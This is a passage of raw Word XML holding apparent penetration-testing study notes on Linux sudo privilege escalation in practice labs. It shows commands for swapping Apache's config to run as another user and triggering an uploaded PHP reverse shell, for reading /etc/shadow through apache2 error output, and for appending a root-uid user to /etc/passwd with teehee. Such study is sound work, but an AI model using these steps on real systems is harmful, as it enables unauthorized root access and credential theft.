        <w:t xml:space="preserve">: We added the username of another user (mahakal) to the Apache Configuration file, and then restarted the apache service, which will then run the apache service as mahakal. And then we also uploaded a reverse shell to /var/www/html and then visited that reverse shell file on firefox, which will make the apache server (now running as mahakal) run that reverse shell. This is how we changed from www-data to mahakal, and then mahakal ended up having more privileges that led to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the contents of apache2.conf to a local file in our own Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and change the usernames to root or one of the two users (I tried all of them but only mahakal worked)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4464975" cy="2683278"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="516" name="image499.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image499.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId644"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4464975" cy="2683278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the file to the target machine using wget and copy the file to replace the actual config file of apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget http://192.168.45.240/apache.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp apache.conf /etc/apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will check the replacement went fine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3804196" cy="2481263"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="439" name="image429.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image429.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId645"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804196" cy="2481263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will create a php reverseshell on kali and upload it to the target. Move it to /var/www/html on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3251200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="250" name="image240.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image240.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64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EA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, create a listener for the shell.php. Restart apache2. We will lose the connection on this listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets visit the shell.php and check the 2nd listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The new shell is with mahakal permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6u0qnfqj17j" w:id="262"/>
      <w:bookmarkEnd w:id="262"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache2 (/usr/sbin/apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Sudo Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can run /usr/sbin/apach2 as sudo, you can actually read the first line of any file. This is because the error message prints out the first line. While this is not always very helpful, you can try looking at the first line of files like /etc/passwd or like /etc/shadow. In the video, they found root password by looking at /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="495300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId647"/>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EAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apach2 -f /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xtj8d46m1xkp" w:id="263"/>
      <w:bookmarkEnd w:id="263"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">teehee (/usr/bin/teehee)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId648">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw an exploit of /usr/bin/teehee where we had sudo privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Teehee is basically a text editor like tee command in bash. This can be used to write new files and overwrite or append into existing files. So, one thing we can do is add a new user with root user id by appending into /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we generate a new password hash using the openssl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4033838" cy="1026361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="428" name="image413.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image413.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId649"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4033838" cy="1026361"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then open the /etc/passwd file in appending mode as super user and append the new user groot with our generated hash and same root uid and gid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1079500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId650"/>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1EC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">head -n 1 /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo teehee -a /etc/passwd</w:t>
      </w:r>
    </w:p>
